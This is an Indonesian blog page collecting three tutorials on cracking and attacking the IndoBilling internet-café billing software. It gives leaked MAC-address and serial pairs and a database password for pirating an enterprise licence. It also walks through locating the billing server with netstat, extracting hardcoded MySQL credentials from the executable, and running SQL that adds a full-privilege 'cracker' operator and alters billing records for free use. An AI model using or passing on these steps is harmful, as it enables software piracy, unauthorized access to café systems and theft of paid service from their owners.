hACKING
Artikel ini lanjutan dari ke-dodol-an dan ke-iseng-an saya dari artikel “hack indobilling v5.92” yang dulu sudah sempat saya tulis. Setelah beberapa hari melakukan pencarian dan percobaan  saya menemukan sudah ada “orang pintar” yang berhasil melakukan cracking untuk indobilling v6.70 untuk 10 client saja. Sedangkan tutorial yang akan saya tulis ini untuk indobilling V6.70 enterprise versi unlimited client.
Persiapan:
  1. Indobilling Server dan Indobilling Client V6.70
  2. Program pengganti MAC Address, bisa cari di google.
  3. SQLyog, untuk edit database SQL.
  4. Sedikit pengetahuan umum.
Langkah pertama setelah semua persiapan lengkap adalah melakukan manipulasi MAC address, untuk diketahui cara hack yang satu ini adalah dengan melakukan manipulasi MAC address agar dianggap oleh indobilling sebagai komputer yang ter-authorisasi. Beberapa informasi penting yang bocor sampai ke saya adalah sebagai berikut:
  • MAC Address 00:1B:B9:CF:13:FB dengan serial number PPZK-J986-I0S8-K907
  • MAC Address 00:0F:EA:D2:F3:51 dengan serial number 1Y5V-9ZP6-JXT9-7I6G
Lakukanlah perubahan sesuai dengan salah satu MAC Address di atas. Ketika mencoba percobaan kemarin kebanyakan MAC address dan serial number pertama kebanyakan gagal sehingga disarankan menggunakan MAC address dan serial yang nomor dua. Dalam percobaan ini saya menggunakan MACMakeUP sebagai tools pengganti MAC address.
Setelah selesai disable lalu enable kembali network connection, kalau masih tidak bisa silahkan restart komputer. Pastikan MAC address yang baru dengan mengetik “ipconfig /all’ di command prompt.
Langkah kedua yaitu menginstall indobilling server, ikuti semua petunjuk install shield sampai selesai. Setelah itu hidupkan mysql service melalui XAMPP panel.
Langkah ketiga, jalankan program indobilling server, kemudian klik “help -> about” masukkan serial number sesuai dengan MAC address yang sudah kalian modifikasi.
Langkah keempat, setelah sukses indobilling server ter-register dengan license enterprise unlimited saatnya melakukan perubahan pada database sql untuk disesuaikan dengan informasi masing-masing. Caranya: Jalankan program SQLyog lalu buatlah sebuah koneksi baru isikan user dengan “root” password “qwer2265r“.
Setelah terhubung dengan database warnet rubahlah beberapa informasi sesuai kebutuhan, biasanya tabel costumer adalah bagian yang sangat perlu di edit.
Setelah selesai melakukan edit database, sekarang saatnya merubah isi konten billserver.ini sesuai kebutuhan. Edit beberapa bagian saja yang diperlukan.
Langkah kelima, jalankan kembali program indobilling server.
Selesai :D
BUG :
Ada beberapa step langkah atau bagian dari cara hacking ini yang terlewatkan oleh saya, yaitu melakukan generate billserver.reg agar informasi di halaman about tidak muncul UnRegistered seperti ini.
Bagian ini bisa diatasi dengan melakukan generate billserver.reg tetapi mungkin karena langkahnya akan semakin menyusahkan beberapa orang saran saya yang terbaik adalah merubah  attributes files “Costumer.MYD” dan “Costumer.MYI” menjadi “read only” tentunya sebelum menjalankan program indobilling server agar tidak terjadi proses looping overwrite.


Ganti Nama Indobilling 5.92 Part. 2 (With Preview)

Posted: August 2, 2009 by bocaherror in Software, Tutor
Bill1
Mungkin ini lanjutan dari CARA MERUBAH NAMA WARNET di Indobilling 5.92
di Tutorial bagian 1 tentang indobilling ternyata cukup mendapat respon. Kali ini kita akan memperjelas cara merubah Nama Warnet di Indobilling 5.92 dengan menampilkan screenshoot.
Syarat nyah udah pada tau kan (bagi yang belum tau silahkan baca postingan kami sebelumnya tentang Indobilling 5.92)

Kerjanyah gini :
  • Install Indobilling
  • Install Karyo.exe
  • Install SqlYog Enterprize V. 7.12 atau yang lebih baru juga sama ajah
  • Jalankan SqlYog Enterprize
  • Buat New Connection dengan username : root dan password : *******(untuk keamanan yg mao request kirim email ke giezbungadeza@gmail.com) lalu klik Connect.
Bill7
  • Lalu buka database Warnet –> Table –> Customer, lalu klik 3.Table Data di Kolom sebelah kanan.
Bill8
  • Lalu edit sesuai keinginan anda data-data warnet yang mencakup nama, alamat, dll seperti gambar di atas.
  • Setelah itu klik save (gambar disket) untuk menyimpan ke Sql Database. Lalu Close.
Bill9
  • Buka program Indobilling Server, dan kita lihat perubahannya seperti gambar dibawah.
Bill10
  • Tetapi ketika kita lihat di help –> About kok masih atas nama Smile Internet dan teregistrasi untuk Aan Priyo. Untuk merubah itu kita cukup membuka file billserver.ini yang berada di C:\indoserver\billserver.ini lalu ubah secukupnya lalu save.
Bill11
  • Maka jika kita lihat lagi di help –> About maka itu akan berubah menjadi seperti yang kita edit tadi.
Bill12
Seperti itulah kawan2 sekalian cara mengakali Nama warnet di Indobilling 5.92.
Sekian dulu di bagian Indobilling ini. 

HAck IndoBilling

Indobilling?? yups.. sebuah billing warnet yang dibuat oleh anak asli Indonesia, walaupun dibuat oleh bangsa sendiri tetapi hal itu rupanya tidak berlaku untuk tangan2 jail. Pada kesempatan kali ini kita akan belajar bagaimana menghack sebuah indobilling. Tutorial ini bukanlah buatanku melainkan buatan saudaraku setanah air invisible_theater

[x] Apa itu indobilling ??
yaahhh... semacam aplikasi billing untuk warnet. mbolehin kita untuk make komputer abis kita login ke billing server alias komp OP.
Ngerti bahasne po ora dab ???? pokok e kaya gt lah ...

[x] Trus permasalahanya apa ???sebenernya ga rumit2x amat sih mslh nya, cm koneksi nya ke database yang
ngga ke-filter.

[x] Trus untungnya apa cb kl mbaca blog mu sampe abis ???ya macem-macem. nubah nama warnet nya, alamat warnet nya,
registrasi warnet nya, nama OP nya, bahkan mbuat km bs ngenet
dengan gratis. (yg terakhir jgn dilakuin ya ... d0s4 !! kan rejekinya udh ada
sendiri-sendiri)

[x] Emang caranya gmn c ???manfaatin aj SQL Manager. eg. SQLyog.

[x] Trus user name sama passwordnya apa ??? kan butuh itu biar bs konek.
Tar deh gmpng.

[x] IP nya tau dr mn ??ya liat aja pake netstat.

[x] Oww ... gt ya ... menarik jg nih. Jelasin dong !!!kay .... pertama kali kita mesti tau IP nya server. dr mn kita tau ???
pake netstat aj.

caranya ::
buat file "netstat.bat" yang isinya berikut ini
============== NETSTAT.BAT ============= [don't copy paste this line]netstat >> netstat.txt
open netstat.txt
========= END OF NETSTAT.BAT =========== [don't copy paste this line]
fungsi dari perintah ini adalah mencetak hasil dari "netstat" ke dalam sebuah file netstat.txt lalu membuka file tersebut. hal ini perlu dilakukan karena indobilling akan melakukan close terhadap comand prompt. (mulai deh make bahasa formal. biasa aj napa bung !!!)
nahhh .. dr hasil netstat itu, bs diliat port 3306 (port default na mySQL) lagi konek kmn.
contoh ::

========= RESULT OF NETSTAT ==================Proto Local Address Foreign Address State
TCP 127.0.0.1:49218 Owner-PC:49219 ESTABLISHED
TCP 127.0.0.1:49219 Owner-PC:49218 ESTABLISHED
TCP 127.0.0.1:49220 Owner-PC:49221 ESTABLISHED
TCP 127.0.0.1:49221 Owner-PC:49220 ESTABLISHED
TCP 192.168.10.16:49168 cs31:5050 ESTABLISHED
TCP 192.168.10.16:49173 sip36:https ESTABLISHED
TCP 192.168.10.16:49559 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49560 202.96.64.144:55944 ESTABLISHED
TCP 192.168.10.16:49561 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49562 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49565 192.168.10.1:3306 ESTABLISHED
==============================================
keliatan kan kalo port 3306 lagi konek ke IP 192.168.10.1. Nah IP itu tu IP na Billing Server.

Sekarang tinggal konek ke DB mySQL pake SQLyog. yg belom punya SQLyog bs didapet disini http://www.webyog.com/downloads/SQLyog604.exe
/*mlm ni masih lumayan ad temennya, nge-blog bareng 'eross fyuuhhh ... tetep ngantuk jg. (cukup ..kelamaan banget kata sambutan nya !!! ini bukan upacara bendera bung !! )*/
kemaren udh sampe di bahasan "mengetahui IP Billing Server", sekarang mulai untuk konek ke DB mySQL nya server.
yang diperluin untuk bisa konek ke DB adalah user name, password dan IP address nya server, yang msh jd pertanyaan adalah "password & username" nya apa ???

==============================
info koneksi ke mySQL server Indo Billing
username : rootpassword : root1==============================

[x]nah lo ... tau dari mana tuw ?? emang developer nya temen mu ??? ato di kasih tau di webshit nya ???yaahh... sedikit jail lah, buka aja file exe-nya pake Winhex, pasti username+password kesimpan di exe-nya sebagai ASCII, jd bisa langsung kebaca tanpa perlu convert2xan. but, jgn langsung maen buka aj, exe-nya diprotect dengan compressor lo, tp jg ga perlu kuatir karena udah ada de-compressor nya. yang jelas compressor nya make UPX, de-compressor nya nyari ndiri aja ya ...
hmmm.... udh deh, kunci udh ditangan, tinggal eksekusi aj.
[x]eksekusi dari hongkong !!!! jelasin dong caranya !!!!!!ya gampang aja, tinggal make SQLyog nya aja, masukin username, password ama host nya dengan data-data yang udah didapet sebelum nya. nama database dibiarkan kosong aja. kalo udah terkoneksi dengan server, maka semua isi database nya bakal keliatan, nah kita bisa ngubah semua hal yang berhubungan dengan indobilling pada table "warnet".
misalnya kita pengen nambahin operator di billing server dengan username "cracker" dan password "cracker" yang full priviledges. bisa dilakukan dengan make GUI nya SQLyog atawa dengan menjalankan SQL command berikut ini :

============================================= [don't copy paste this line]insert into operator (op_id,op_user,op_password,op_name,item,member,setup,report,close,send,billing,
op_editbilling,op_delbilling,op_editmember,op_delmember,op_edititem,op_delitem,
op_cancel)
values (22,'cracker',password('cracker'),'intruder','true','true','true','true','true','true','true','Y','Y','Y','Y','Y','Y','Y')

============================================= [don't copy paste this line]

nahhh .... gampang kan.
kalo pengen ngubah harga billing juga bisa. SQL command nya kira-kira kaya gini ni
dimana,
-> format st_start = 'yyyy-mm-dd hh:mm:ss'
-> format st_name = 'nama username'
-> st_id = 'nomor KBU'
yang perlu diinget adalah nilai "st_start" harus waktu saat pengupdatean DB dilakuin. bisa juga dengan make fungsi SQL yaitu curdate() dan curdate().

============================================= [don't copy paste this line]update station set st_start='2007-07-01 20:30:30',st_name='invisible_theater', st_duration='00:01:00' where st_id='1'============================================= [don't copy paste this line]
dengan menggunakan fungsi curdate() dan curtime() kira-kira kaya gini ni.

============================================= [don't copy paste this line]update station set st_start=concat(curdate(),' ',curtime()),st_name='invisible_theater', st_duration='00:01:00' where st_id='1'============================================= [don't copy paste this line]
kalo emang pengen ngganti2x data laen nya silakan cari ndiri aja, ini kan sekedar contoh implementasi aj dab.

[x]hmmm.... boleh-boleh .......... trus kq bisa ya ??? ada apa c sebenernya??yahhh sebenernya cm masalah setting doang, IP address yang bukan localhost diperbolehkan untuk connect langsung ke database dan melakukan edit. too simple right ?

kira-kira gitu deh ... silakan di uprek sendiri dengan kreatifitas sendiri ya ...


Diposting oleh ARIP PRASETYO OK Label:

0 komentar :

MARVEL and SPIDER-MAN: TM & 2007 Marvel Characters, Inc. Motion Picture © 2007 Columbia Pictures Industries, Inc. All Rights Reserved. 2007 Sony Pictures Digital Inc. All rights reserved. Template distributed by BloggerTemplatesWidgets